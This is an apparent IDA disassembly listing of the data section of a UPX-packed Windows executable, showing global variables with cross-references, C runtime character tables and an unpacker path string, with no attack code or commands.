dword_4CB6E0 dd 71AB401Ch ; DATA XREF: sub_401ACD+1E57�r
; sub_401ACD+5AEE�r ...
dword_4CB6E4 dd 71C214BAh ; DATA XREF: sub_409B13+9B1�w
; sub_409B13+A2B�r ...
dword_4CB6E8 dd 71AB868Dh ; DATA XREF: sub_409B13+65E�w
; sub_409B13+794�r ...
dword_4CB6EC dd 71AB1A6Dh ; DATA XREF: sub_40111D+12�r
; sub_4017ED+D0�r ...
dword_4CB6F0 dd 71AB155Ah ; DATA XREF: sub_409B13+59B�w
; sub_409B13+70C�r ...
dword_4CB6F4 dd 71B22C25h ; DATA XREF: sub_409B13+B36�w
; sub_409B13+B57�r
dword_4CB6F8 dd 71AB5A01h ; DATA XREF: sub_409B13+540�w
; sub_409B13+6C4�r ...
dword_4CB6FC dd 71B2ACCBh ; DATA XREF: sub_409B13+B29�w
; sub_409B13+B4A�r
dword_4CB700 dd 77E78C17h ; DATA XREF: sub_401221+52�r
; sub_409B13+31�w ...
dword_4CB704 dd 77D49A11h ; DATA XREF: sub_409B13+17F�w
; sub_409B13+1CA�r ...
dd 0
dword_4CB70C dd 76D62A37h ; DATA XREF: sub_409B13+927�w
; sub_409B13+93B�r ...
dword_4CB710 dd 77E6CBF9h ; DATA XREF: sub_409B13+99�w
; sub_409B13+EA�r ...
dword_4CB714 dd 0 ; DATA XREF: sub_409B13:loc_409C11�w
; sub_409B13+12B�w ...
dword_4CB718 dd 0 ; DATA XREF: sub_409B13+126�w
; sub_40A7CF+1C�r
dword_4CB71C dd 0 ; DATA XREF: sub_409B13:loc_409D01�w
; sub_409B13:loc_409D68�w ...
dword_4CB720 dd 0 ; DATA XREF: sub_409B13+250�w
; sub_40A7CF+50�r
dword_4CB724 dd 0 ; DATA XREF: sub_401221+349�r
; sub_401ACD+4568�r ...
dword_4CB728 dd 0 ; DATA XREF: sub_409B13+41E�w
; sub_40A7CF+84�r
dword_4CB72C dd 0 ; DATA XREF: sub_409B13:loc_40A017�w
; sub_40A7CF:loc_40A87F�r
dword_4CB730 dd 0 ; DATA XREF: sub_409B13+4FF�w
; sub_40A7CF+B8�r
dword_4CB734 dd 0 ; DATA XREF: sub_409B13:loc_40A2E8�w
; sub_40A7CF:loc_40A8B3�r
dword_4CB738 dd 0 ; DATA XREF: sub_409B13+7D0�w
; sub_40A7CF+EC�r
dword_4CB73C dd 0 ; DATA XREF: sub_409B13:loc_40A3D3�w
; sub_409B13+8EF�w ...
dword_4CB740 dd 0 ; DATA XREF: sub_409B13+8EA�w
; sub_40A7CF+120�r
dword_4CB744 dd 0 ; DATA XREF: sub_401ACD:loc_406F18�r
; sub_409B13:loc_40A467�w ...
dword_4CB748 dd 0 ; DATA XREF: sub_409B13+94F�w
; sub_40A7CF+154�r
dword_4CB74C dd 0 ; DATA XREF: sub_401ACD+4570�r
; sub_409B13:loc_40A583�w ...
dword_4CB750 dd 0 ; DATA XREF: sub_409B13+A6B�w
; sub_40A7CF+188�r
dword_4CB754 dd 0 ; DATA XREF: sub_409B13:loc_40A5CD�w
; sub_40A7CF:loc_40A983�r
dword_4CB758 dd 0 ; DATA XREF: sub_409B13+AB5�w
; sub_40A7CF+1BC�r
dword_4CB75C dd 0 ; DATA XREF: sub_409B13:loc_40A617�w
; sub_40A7CF:loc_40A9B7�r
dword_4CB760 dd 0 ; DATA XREF: sub_409B13+AFF�w
; sub_40A7CF+1F0�r
dword_4CB764 dd 0 ; DATA XREF: sub_409B13:loc_40A68B�w
; sub_40A7CF:loc_40A9EB�r
dword_4CB768 dd 0 ; DATA XREF: sub_409B13+B73�w
; sub_40A7CF+224�r
dword_4CB76C dd 0 ; DATA XREF: sub_409B13:loc_40A6D5�w
; sub_40A7CF:loc_40AA1F�r
dword_4CB770 dd 0 ; DATA XREF: sub_409B13+BBD�w
; sub_40A7CF+258�r
dword_4CB774 dd 0 ; DATA XREF: sub_409B13:loc_40A773�w
; sub_40A7CF:loc_40AA53�r
dword_4CB778 dd 0 ; DATA XREF: sub_409B13+C5B�w
; sub_40A7CF+28C�r
dword_4CB77C dd 0 ; DATA XREF: sub_409B13:loc_40A7BD�w
; sub_40A7CF:loc_40AA87�r
dword_4CB780 dd 0 ; DATA XREF: sub_409B13+CA5�w
; sub_40A7CF+2C0�r
dword_4CB784 dd 7 dup(0) ; DATA XREF: sub_40AC10+32�o
dword_4CB7A0 dd 0 ; DATA XREF: sub_40BA57+18�r
; sub_40BFEC+92�w ...
dword_4CB7A4 dd 0 ; DATA XREF: sub_40C125+4D�r
; sub_40C33D+D9�w ...
dd 7FEh dup(0)
dword_4CD7A0 dd 6 dup(0) ; DATA XREF: sub_40C125+D2�o
; sub_40C125+13B�o ...
dword_4CD7B8 dd 0 ; DATA XREF: sub_40BACE+2C4�w
; sub_40BACE+348�o
dword_4CD7BC dd 0 ; DATA XREF: sub_40BACE+33E�w
; sub_40BACE+35A�r
dword_4CD7C0 dd 0 ; DATA XREF: sub_40BACE+2CF�w
dword_4CD7C4 dd 0 ; DATA XREF: sub_40BACE+2B9�w
; sub_40BACE:loc_40BDE3�r
dword_4CD7C8 dd 20h dup(0) ; DATA XREF: sub_40BACE+2E2�o
; sub_40BACE+302�o
dword_4CD848 dd 0 ; DATA XREF: sub_40BACE+2D5�w
dword_4CD84C dd 0 ; DATA XREF: sub_40BACE+2EF�w
; sub_40BACE+30F�w
dword_4CD850 dd 0 ; DATA XREF: sub_40BACE:loc_40BE3E�r
align 8
dword_4CD858 dd 0 ; DATA XREF: sub_40BACE+82�w
; sub_40BACE+101�o
dword_4CD85C dd 41h dup(0) ; DATA XREF: sub_40BACE+41�o
dword_4CD960 dd 41h dup(0) ; DATA XREF: sub_40BACE+69�o
dword_4CDA64 dd 0 ; DATA XREF: sub_40BACE+F7�w
; sub_40BACE+113�r
dword_4CDA68 dd 0 ; DATA XREF: sub_40BACE+52�w
dword_4CDA6C dd 0 ; DATA XREF: sub_40BACE+4D�w
; sub_40BACE+D4�r
dword_4CDA70 dd 20h dup(0) ; DATA XREF: sub_40BACE+9A�o
; sub_40BACE+BA�o
dword_4CDAF0 dd 0 ; DATA XREF: sub_40BACE+8F�w
dword_4CDAF4 dd 0 ; DATA XREF: sub_40BACE+A7�w
; sub_40BACE+C7�w
dword_4CDAF8 dd 0 ; DATA XREF: sub_40BACE:loc_40BBF7�r
align 10h
dword_4CDB00 dd 0 ; DATA XREF: sub_40BACE+1A5�w
; sub_40BACE+225�o
dword_4CDB04 dd 41h dup(0) ; DATA XREF: sub_40BACE+167�o
dword_4CDC08 dd 41h dup(0) ; DATA XREF: sub_40BACE+18C�o
dword_4CDD0C dd 0 ; DATA XREF: sub_40BACE+21B�w
; sub_40BACE+237�r
dword_4CDD10 dd 0 ; DATA XREF: sub_40BACE+17A�w
dword_4CDD14 dd 0 ; DATA XREF: sub_40BACE+175�w
; sub_40BACE+1F8�r
dword_4CDD18 dd 20h dup(0) ; DATA XREF: sub_40BACE+1BE�o
; sub_40BACE+1DE�o
dword_4CDD98 dd 0 ; DATA XREF: sub_40BACE+1B1�w
dword_4CDD9C dd 0 ; DATA XREF: sub_40BACE+1CB�w
; sub_40BACE+1EB�w
dword_4CDDA0 dd 0 ; DATA XREF: sub_40BACE:loc_40BD1B�r
align 8
dword_4CDDA8 dd 0 ; DATA XREF: sub_40BACE+417�w
; sub_40BACE+470�o
dword_4CDDAC dd 0A2h dup(0) ; DATA XREF: sub_40BACE+405�o
dword_4CE034 dd 41h dup(0) ; DATA XREF: sub_40BACE+3CF�o
dword_4CE138 dd 0 ; DATA XREF: sub_40BACE+3FC�w
; sub_40BACE+423�r
align 10h
dword_4CE140 dd 0 ; DATA XREF: sub_40BACE+466�w
; sub_40BACE+482�r
dword_4CE144 dd 0 ; DATA XREF: sub_40BACE+429�w
dword_4CE148 dd 0 ; DATA XREF: sub_40BACE+436�w
dword_4CE14C dd 0 ; DATA XREF: sub_40BACE+3F6�w
dd 0
dword_4CE154 dd 0 ; DATA XREF: sub_40BACE:loc_40BF66�r
dd 0
dword_4CE15C dd 0 ; DATA XREF: sub_40B71A+E�r
; sub_40B71A+32�r ...
dword_4CE160 dd 0 ; DATA XREF: sub_40B71A+9�r
; sub_40B71A+26�r ...
dword_4CE164 dd 82h dup(0) ; DATA XREF: sub_40C59C+8D�o
dword_4CE36C dd 2 dup(0) ; DATA XREF: sub_40CF05+68�o
dword_4CE374 dd 2080Ah ; DATA XREF: sub_40D8A0+8�w
; sub_40D99C+2D3�o
dd 0
dword_4CE37C dd 2 dup(0) ; DATA XREF: sub_40D99C+209�o
dword_4CE384 dd 0 ; DATA XREF: sub_40E4B9+1F�r
; sub_40E504+BC�o ...
dword_4CE388 dd 0 ; DATA XREF: sub_40E504+B7�o
; sub_40E504+DA�r ...
dword_4CE38C dd 0 ; DATA XREF: sub_40E504+9A�o
; sub_40E504+CF�r ...
dword_4CE390 dd 0 ; DATA XREF: sub_40E476+35�r
; sub_40E504+95�o ...
dword_4CE394 dd 0 ; DATA XREF: sub_40E476+17�r
; sub_40E4B9+3D�r ...
dd 0
dword_4CE39C dd 0C4CBh ; DATA XREF: sub_40BACE+2AE�r
; sub_40E6D9+10�w ...
dd 0
dword_4CE3A4 dd 0 ; DATA XREF: sub_40B786+1C�r
; sub_40E6F0+27C�w
dword_4CE3A8 dd 0 ; DATA XREF: sub_40EFBF+2A�w
; sub_40EFBF+51�r ...
dd 3 dup(0)
dword_4CE3B8 dd 0 ; DATA XREF: sub_4107C0+146�r
align 10h
dword_4CE3C0 dd 0 ; DATA XREF: sub_412352+4�w
; sub_412352+9�o
align 8
byte_4CE3C8 db 0 ; DATA XREF: sub_412E9E+1D3�w
; sub_412E9E+2D2�o
align 2
word_4CE3CA dw 0 ; DATA XREF: sub_412E9E+1E3�w
word_4CE3CC dw 0 ; DATA XREF: sub_412E9E+1E9�w
word_4CE3CE dw 0 ; DATA XREF: sub_412E9E+1F0�w
byte_4CE3D0 db 0 ; DATA XREF: sub_412E9E+1F7�w
byte_4CE3D1 db 0 ; DATA XREF: sub_412E9E+1FE�w
word_4CE3D2 dw 0 ; DATA XREF: sub_412E9E+204�w
dword_4CE3D4 dd 0 ; DATA XREF: sub_412E9E+234�w
; sub_412E9E+250�w
dword_4CE3D8 dd 0 ; DATA XREF: sub_412E9E+258�w
byte_4CE3DC db 0 ; DATA XREF: sub_412E9E+26A�w
byte_4CE3DD db 0 ; DATA XREF: sub_412E9E+27D�w
word_4CE3DE dw 0 ; DATA XREF: sub_412E9E+295�w
word_4CE3E0 dw 0 ; DATA XREF: sub_412E9E+2A4�w
word_4CE3E2 dw 0 ; DATA XREF: sub_412E9E+29C�w
dword_4CE3E4 dd 101h dup(0) ; DATA XREF: sub_412E9E+2B9�o
dword_4CE7E8 dd 80h dup(0) ; DATA XREF: sub_401ACD+2F6F�o
; sub_401ACD:loc_404AC5�o ...
byte_4CE9E8 db 0 ; DATA XREF: sub_414746+1A1�w
; sub_414746+27A�o
align 2
word_4CE9EA dw 0 ; DATA XREF: sub_414746+1AE�w
word_4CE9EC dw 0 ; DATA XREF: sub_414746+1B8�w
word_4CE9EE dw 0 ; DATA XREF: sub_414746+1C1�w
byte_4CE9F0 db 0 ; DATA XREF: sub_414746+1C8�w
byte_4CE9F1 db 0 ; DATA XREF: sub_414746+1CF�w
word_4CE9F2 dw 0 ; DATA XREF: sub_414746+1D6�w
dword_4CE9F4 dd 0 ; DATA XREF: sub_414746+1E3�w
dword_4CE9F8 dd 0 ; DATA XREF: sub_414746+1EB�w
word_4CE9FC dw 0 ; DATA XREF: sub_414746+244�w
word_4CE9FE dw 0 ; DATA XREF: sub_414746+22C�w
word_4CEA00 dw 0 ; DATA XREF: sub_414746+256�w
word_4CEA02 dw 0 ; DATA XREF: sub_414746+1F7�w
dword_4CEA04 dd 101h dup(0) ; DATA XREF: sub_414746+265�o
dword_4CEE08 dd 0 ; DATA XREF: sub_401ACD+1A24�w
; sub_401ACD+2F67�r ...
dd 3 dup(0)
byte_4CEE18 db 0 ; DATA XREF: sub_414C2F+241�o
; sub_414C2F+250�w ...
byte_4CEE19 db 0 ; DATA XREF: sub_414C2F+264�w
word_4CEE1A dw 0 ; DATA XREF: sub_414C2F+295�w
word_4CEE1C dw 0 ; DATA XREF: sub_414C2F+27C�w
; sub_414C2F:loc_415001�w
word_4CEE1E dw 0 ; DATA XREF: sub_414C2F+29B�w
byte_4CEE20 db 0 ; DATA XREF: sub_414C2F+288�w
byte_4CEE21 db 0 ; DATA XREF: sub_414C2F+25D�w
word_4CEE22 dw 0 ; DATA XREF: sub_414C2F+3F2�w
; sub_414C2F+41C�w
dword_4CEE24 dd 0 ; DATA XREF: sub_414C2F:loc_414EF8�w
; sub_414C2F+39A�r
dword_4CEE28 dd 0 ; DATA XREF: sub_414C2F+2D6�w
word_4CEE2C dw 0 ; DATA XREF: sub_414C2F+394�w
; sub_414C2F+3E8�o
word_4CEE2E dw 0 ; DATA XREF: sub_414C2F+335�w
; sub_414C2F+35A�r ...
dword_4CEE30 dd 0 ; DATA XREF: sub_414C2F+30C�w
; sub_414C2F+3D9�w
dword_4CEE34 dd 0 ; DATA XREF: sub_414C2F+328�w
; sub_414C2F+3AB�w ...
byte_4CEE38 db 0 ; DATA XREF: sub_414C2F+311�r
; sub_414C2F+31F�w
byte_4CEE39 db 0 ; DATA XREF: sub_414C2F+2DB�w
; sub_414C2F+3A4�w ...
word_4CEE3A dw 0 ; DATA XREF: sub_414C2F+2E9�w
word_4CEE3C dw 0 ; DATA XREF: sub_414C2F+3F9�w
; sub_414C2F+42A�w
word_4CEE3E dw 0 ; DATA XREF: sub_414C2F+32E�w
word_4CEE40 dw 0 ; DATA XREF: sub_414C2F+360�w
; sub_414C2F+432�o
word_4CEE42 dw 0 ; DATA XREF: sub_414C2F+36F�w
; sub_414C2F+409�w
dword_4CEE44 dd 0 ; DATA XREF: sub_414C2F+369�w
align 10h
dword_4CEE50 dd 0 ; DATA XREF: sub_414C2F+39F�w
; sub_414C2F+417�o
dword_4CEE54 dd 0 ; DATA XREF: sub_414C2F+33B�w
byte_4CEE58 db 0 ; DATA XREF: sub_414C2F+341�w
byte_4CEE59 db 0 ; DATA XREF: sub_414C2F+347�w
word_4CEE5A dw 0 ; DATA XREF: sub_414C2F+354�w
dword_4CEE5C dd 7 dup(0) ; DATA XREF: sub_414C2F+3ED�o
dword_4CEE78 dd 0 ; DATA XREF: sub_414C2F+30�w
; sub_414C2F+43B�r
dword_4CEE7C dd 100h dup(0) ; DATA XREF: sub_414C2F+1C3�o
; sub_414C2F+47E�o
dword_4CF27C dd 1000h dup(0) ; DATA XREF: sub_4151AD+1D�o
; sub_41524D�o ...
dword_4D327C dd 0 ; DATA XREF: sub_4151AD+13�o
; sub_41524D+E�o ...
dword_4D3280 dd 0 ; DATA XREF: sub_4155F8+F�r
; sub_4157F1+12�r
align 8
dword_4D3288 dd 0Eh dup(0) ; DATA XREF: sub_416923+F�o
dword_4D32C0 dd 80h dup(0) ; DATA XREF: sub_4175EA+41�o
dword_4D34C0 dd 200h dup(0) ; DATA XREF: sub_416F1B+C7�o
; sub_417276+DD�o ...
dword_4D3CC0 dd 124h dup(0) ; DATA XREF: sub_416F1B+D6�o
; sub_417276+F4�o ...
db 2 dup(0)
word_4D4152 dw 0 ; DATA XREF: UPX0:off_437F28�o
dd 0DBh dup(0)
dword_4D44C0 dd 0 ; DATA XREF: sub_416F1B+86�w
; sub_4170ED+94�r
dword_4D44C4 dd 0 ; DATA XREF: sub_416F1B+A7�w
; sub_417553+55�r ...
dword_4D44C8 dd 0 ; DATA XREF: sub_416F1B+A0�w
; sub_4170ED+D6�r ...
dword_4D44CC dd 0 ; DATA XREF: sub_416F1B+79�w
; sub_4170ED+35�r ...
dword_4D44D0 dd 80h dup(0) ; DATA XREF: sub_417553+5E�o
dword_4D46D0 dd 0 ; DATA XREF: sub_416F1B+93�w
; sub_4170ED+A2�r
align 8
dword_4D46D8 dd 0 ; DATA XREF: sub_416F1B+E7�o
; sub_416F1B+103�r ...
dword_4D46DC dd 0 ; DATA XREF: sub_417276+17B�w
; sub_41741D+107�w
dword_4D46E0 dd 0 ; DATA XREF: sub_417276+180�w
; sub_41741D+10D�w ...
dword_4D46E4 dd 0 ; DATA XREF: sub_417276+159�w
; sub_417553+4F�r
dword_4D46E8 dd 0 ; DATA XREF: sub_4178BB+22�w
; sub_4178BB:loc_417A40�w ...
dword_4D46EC dd 0 ; DATA XREF: sub_401ACD+3CC4�o
; sub_417789+12�o ...
dd 0
dword_4D46F4 dd 0 ; DATA XREF: sub_4178BB+1C�r
; sub_417A60+3A�r
dd 7Fh dup(0)
dword_4D48F4 dd 0 ; DATA XREF: sub_4178BB+28�r
; sub_417A60+4A�w
dd 1944h dup(0)
dword_4DAE08 dd 0 ; DATA XREF: sub_417A60+23�o
dword_4DAE0C dd 81h dup(0) ; DATA XREF: sub_401ACD+3CE2�o
; sub_417789+3C�o ...
dword_4DB010 dd 17h dup(0) ; DATA XREF: sub_4187DE:loc_4188FB�o
; sub_4187DE+131�o ...
dword_4DB06C dd 80h dup(0) ; DATA XREF: sub_419594+7C�o
; sub_419594+A5�o
dword_4DB26C dd 0 ; DATA XREF: sub_418B59+45�w
; sub_418B59+4D�r ...
dword_4DB270 dd 17h dup(0) ; DATA XREF: sub_419460:loc_419582�o
; sub_419460+12D�o
dword_4DB2CC dd 80h dup(0) ; DATA XREF: sub_418A99+4C�o
; sub_418A99+7E�o ...
byte_4DB4CC db 0 ; DATA XREF: sub_418B59+29�r
; sub_418B59+34�w
align 10h
dword_4DB4D0 dd 80h dup(0) ; DATA XREF: sub_418DB0+61�o
; sub_418DB0+89�o ...
dword_4DB6D0 dd 81h dup(0) ; DATA XREF: sub_4186C2:loc_4186FA�o
; sub_4186C2+5B�o
dword_4DB8D4 dd 0 ; DATA XREF: sub_419A21:loc_419A42�r
; sub_419B10+54�r ...
dword_4DB8D8 dd 0 ; DATA XREF: sub_419A21�r
; sub_419B10+37�r ...
dword_4DB8DC dd 0 ; DATA XREF: sub_419A51+1A�r
; sub_419C65+83�o
dword_4DB8E0 dd 0 ; DATA XREF: sub_419A21:loc_419A35�r
; sub_419C65+11B�w
dword_4DB8E4 dd 0Dh dup(0) ; DATA XREF: sub_419B10+13�o
; sub_419C65:loc_419DA2�o
dword_4DB918 dd 0 ; DATA XREF: sub_419B10+CD�r
; sub_419B10+EC�r ...
align 10h
dword_4DB920 dd 0Eh dup(0) ; DATA XREF: sub_41A88C+47�o
dword_4DB958 dd 0 ; DATA XREF: sub_41BBBD+1B9�w
; sub_41D1EC:loc_41D268�w ...
dword_4DB95C dd 0 ; DATA XREF: sub_41D3BE+35�w
; sub_41DA72:loc_41DB0C�w ...
dword_4DB960 dd 0 ; DATA XREF: sub_423A33+13A�r
dword_4DB964 dd 0A28h ; DATA XREF: UPX0:0041D985�w
dword_4DB968 dd 501h ; DATA XREF: UPX0:0041D97C�w
dword_4DB96C dd 5 ; DATA XREF: UPX0:0041D971�w
dword_4DB970 dd 1 ; DATA XREF: UPX0:0041D963�w
dword_4DB974 dd 1 ; DATA XREF: sub_401221:loc_401516�r
; sub_422F83+91�w
dword_4DB978 dd 930B20h ; DATA XREF: sub_401221+2FE�r
; sub_401221+31E�r ...
align 10h
dword_4DB980 dd 930B48h ; DATA XREF: sub_422ECA+44�w
; sub_425AC7+9�r ...
dword_4DB984 dd 0 ; DATA XREF: sub_4261AB+36�r
dword_4DB988 dd 0 ; DATA XREF: sub_425AC7+16�r
; sub_425E95+4�r ...
align 10h
off_4DB990 dd offset aCM_unpackerPac ; DATA XREF: sub_422F83+2E�w
; "C:\\m_unpacker\\packed.exe"
align 8
byte_4DB998 db 0 ; DATA XREF: sub_41B7D3+2D�w
; sub_4239DB+5�r
align 4
dword_4DB99C dd 0 ; DATA XREF: sub_41B7D3+27�w
dword_4DB9A0 dd 0 ; DATA XREF: sub_41B7D3+4�r
; sub_41B7D3+8B�w
dword_4DB9A4 dd 0 ; DATA XREF: sub_41C0F4+3B�r
; sub_41C0F4+91�w
dd 0
dword_4DB9AC dd 0 ; DATA XREF: sub_41C748+A�w
dword_4DB9B0 dd 0 ; DATA XREF: sub_41D081+5E�r
; sub_41D081+A4�w
align 8
word_4DB9B8 dw 0 ; DATA XREF: sub_41D081+55�r
; sub_41D081+9A�o
word_4DB9BA dw 0 ; DATA XREF: sub_41D081+48�r
db 2 dup(0)
word_4DB9BE dw 0 ; DATA XREF: sub_41D081+3B�r
word_4DB9C0 dw 0 ; DATA XREF: sub_41D081+2E�r
word_4DB9C2 dw 0 ; DATA XREF: sub_41D081+21�r
align 8
dword_4DB9C8 dd 0 ; DATA XREF: UPX0:0041D9B7�w
; sub_422ECA:loc_422EDC�r ...
align 10h
dword_4DB9D0 dd 0 ; DATA XREF: sub_41DA29�r sub_41DA4E�r ...
dword_4DB9D4 dd 0 ; DATA XREF: sub_41EB10+4B�w
; sub_41EC29+2D�w ...
dword_4DB9D8 dd 0 ; DATA XREF: sub_41F312�r
dword_4DB9DC dd 0 ; DATA XREF: sub_41B202:loc_41B31E�r
; sub_41B202:loc_41B43F�r ...
dword_4DB9E0 dd 1 ; DATA XREF: sub_41FEA9:loc_420024�r
; sub_420042+4�w ...
dword_4DB9E4 dd 0 ; DATA XREF: sub_420446+37�r
dd 0
dword_4DB9EC dd 0 ; DATA XREF: sub_4219D9+11�r
; sub_421ADD+1A�r ...
byte_4DB9F0 db 0 ; DATA XREF: sub_4219D9+3�r
; sub_4219D9+98�r ...
align 4
dword_4DB9F4 dd 0 ; DATA XREF: sub_421ADD+11�r
; sub_421BBB+21�w ...
byte_4DB9F8 db 0 ; DATA XREF: sub_421BBB+51�w
align 4
dword_4DB9FC dd 0 ; DATA XREF: sub_421DB1+4E�r
; sub_42218C+3A�r ...
dword_4DBA00 dd 0 ; DATA XREF: sub_421DB1+5C�r
; sub_42218C+43�r ...
dword_4DBA04 dd 0 ; DATA XREF: sub_41C9CE+7A�r
; sub_421F58+5�r
dword_4DBA08 dd 0 ; DATA XREF: sub_42255C+29�r
dword_4DBA0C dd 2 dup(0) ; DATA XREF: sub_41D160+C�o
dword_4DBA14 dd 0 ; DATA XREF: sub_41D5AA+4�r
; sub_41D5AA+6E�r ...
dd 3 dup(0)
dword_4DBA24 dd 0 ; DATA XREF: sub_41D834+61�r
; sub_41D834+BF�r ...
dd 0
dword_4DBA2C dd 1 ; DATA XREF: sub_422ACA+28�r
; sub_422ACA+4C�w ...
dword_4DBA30 dd 0 ; DATA XREF: sub_422CEE+3A�r
; sub_422CEE+46�w ...
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_422F83:loc_422F9A�o
; UPX1:off_4DB990�o
align 10h
dd 3Ah dup(0)
dword_4DBB38 dd 1 ; DATA XREF: sub_4231D0+2�r
; sub_4231D0+23�w ...
dword_4DBB3C dd 0 ; DATA XREF: sub_423590+21�r
dword_4DBB40 dd 0 ; DATA XREF: sub_41F32D+154�w
; sub_420446:loc_42046F�w ...
dword_4DBB44 dd 0 ; DATA XREF: sub_41F32D+7�r
dword_4DBB48 dd 1 ; DATA XREF: sub_423CEC+26�r
; sub_423CEC:loc_423D56�w
align 10h
word_4DBB50 dw 0 ; DATA XREF: sub_4245E9+1A�o
; sub_4245E9+46�r
byte_4DBB52 db 0 ; DATA XREF: sub_4245E9+39�r
align 4
dword_4DBB54 dd 7 dup(0) ; DATA XREF: sub_4245E9+52�o
dword_4DBB70 dd 0 ; DATA XREF: sub_4245E9+40�w
; sub_4245E9+5C�o
dword_4DBB74 dd 0 ; DATA XREF: sub_4245E9+4D�w
dword_4DBB78 dd 0 ; DATA XREF: sub_4245E9+31�w
dword_4DBB7C dd 0 ; DATA XREF: sub_4245E9+52�w
dword_4DBB80 dd 77C26E79h ; DATA XREF: sub_42470C:loc_42472F�r
; sub_42470C+38�r ...
align 8
dword_4DBB88 dd 0 ; DATA XREF: sub_4247EC+11�w
; sub_4247EC+63�w ...
align 10h
dword_4DBB90 dd 0 ; DATA XREF: sub_4247EC+33�o
; sub_4247EC+46�r
dword_4DBB94 dd 10h dup(0) ; DATA XREF: sub_4247EC+C1�o
word_4DBBD4 dw 0 ; DATA XREF: sub_424A4A+A8�r
word_4DBBD6 dw 0 ; DATA XREF: sub_4247EC+54�r
; sub_424A4A+DB�r ...
word_4DBBD8 dw 0 ; DATA XREF: sub_424A4A+CA�r
word_4DBBDA dw 0 ; DATA XREF: sub_424A4A+D3�r
; sub_424A4A:loc_424B3C�r
word_4DBBDC dw 0 ; DATA XREF: sub_424A4A+C0�r
word_4DBBDE dw 0 ; DATA XREF: sub_424A4A+B8�r
word_4DBBE0 dw 0 ; DATA XREF: sub_424A4A+B0�r
word_4DBBE2 dw 0 ; DATA XREF: sub_424A4A+9E�r
dword_4DBBE4 dd 0 ; DATA XREF: sub_4247EC+4B�r
dword_4DBBE8 dd 10h dup(0) ; DATA XREF: sub_4247EC+FB�o
word_4DBC28 dw 0 ; DATA XREF: sub_424A4A+46�r
word_4DBC2A dw 0 ; DATA XREF: sub_4247EC:loc_424863�r
; sub_424A4A+78�r ...
word_4DBC2C dw 0 ; DATA XREF: sub_424A4A+67�r
word_4DBC2E dw 0 ; DATA XREF: sub_424A4A+70�r
; sub_424A4A:loc_424ACE�r
word_4DBC30 dw 0 ; DATA XREF: sub_424A4A+5D�r
word_4DBC32 dw 0 ; DATA XREF: sub_424A4A+55�r
word_4DBC34 dw 0 ; DATA XREF: sub_424A4A+4D�r
word_4DBC36 dw 0 ; DATA XREF: sub_424A4A+3E�r
dword_4DBC38 dd 0 ; DATA XREF: sub_4247EC+80�r
dword_4DBC3C dd 0 ; DATA XREF: sub_4247EC+132�r
; sub_4247EC:loc_424938�r ...
dword_4DBC40 dd 0 ; DATA XREF: sub_4247D7�r sub_4247D7+E�w
dword_4DBC44 dd 0 ; DATA XREF: sub_424D78+3�r
; sub_424D78+2E�w ...
dword_4DBC48 dd 0 ; DATA XREF: sub_424D78+43�w
; sub_424D78:loc_424DC7�r
dword_4DBC4C dd 0 ; DATA XREF: sub_424D78+4A�w
; sub_424D78+60�r
dword_4DBC50 dd 0 ; DATA XREF: sub_423A33+3F�r
dword_4DBC54 dd 0 ; DATA XREF: sub_425955:loc_4259BC�r
; sub_425955+6D�o
dword_4DBC58 dd 0 ; DATA XREF: sub_425955:loc_425993�r
; sub_425955+44�o
dword_4DBC5C dd 0 ; DATA XREF: sub_425955:loc_425986�r
; sub_425955+37�o
dword_4DBC60 dd 0 ; DATA XREF: sub_425955:loc_4259A0�r
; sub_425955+51�o
align 8
dword_4DBC68 dd 0 ; DATA XREF: sub_425F03+28�r
; sub_425F03+48�w ...
dword_4DBC6C dd 0 ; DATA XREF: sub_426988+28�r
; sub_426988+4C�w ...
dword_4DBC70 dd 0 ; DATA XREF: sub_426C13+26�r
; sub_426C13:loc_426C7D�w
byte_4DBC74 db 1 ; DATA XREF: sub_40D879�r sub_40D879+9�w
align 4
dword_4DBC78 dd 931110h ; DATA XREF: sub_41DBF0:loc_41DC01�r
; sub_41F49D+14�r ...
align 10h
dword_4DBC80 dd 400h dup(0) ; DATA XREF: UPX0:off_43D0C8�o
; UPX0:0043D0D0�o
dword_4DCC80 dd 200h ; DATA XREF: sub_41DBF0+9�r
; sub_41DBF0+56�r ...
dd 7 dup(0)
dword_4DCCA0 dd 930650h ; DATA XREF: sub_41F043+75�r
; sub_41F11C+2A�r ...
dword_4DCCA4 dd 3Fh dup(0) ; DATA XREF: sub_423302+92�o
dword_4DCDA0 dd 20h ; DATA XREF: sub_41DA72+8�r
; sub_41F11C+C�r ...
dword_4DCDA4 dd 4E4h ; DATA XREF: sub_41FEA9+14�r
; sub_41FEA9+65�w ...
align 10h
dword_4DCDB0 dd 3 dup(0) ; DATA XREF: sub_41FEA9+123�o
; sub_41FEA9+171�o ...
dword_4DCDBC dd 0 ; DATA XREF: sub_41FEA9+108�w
; sub_41FEA9+15D�w ...
byte_4DCDC0 db 0 ; DATA XREF: sub_4200E8:loc_4201F4�w
; sub_4200E8:loc_420211�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
byte_4DCEC0 db 0 ; DATA XREF: sub_41FEA9+5C�o
; sub_41FEA9+AF�o ...
byte_4DCEC1 db 0 ; DATA XREF: sub_41B9D1+5D�r
; sub_41FEA9+A0�w ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
dword_4DCFC4 dd 0 ; DATA XREF: sub_41FEA9+6E�w
; sub_41FEA9+12B�w ...
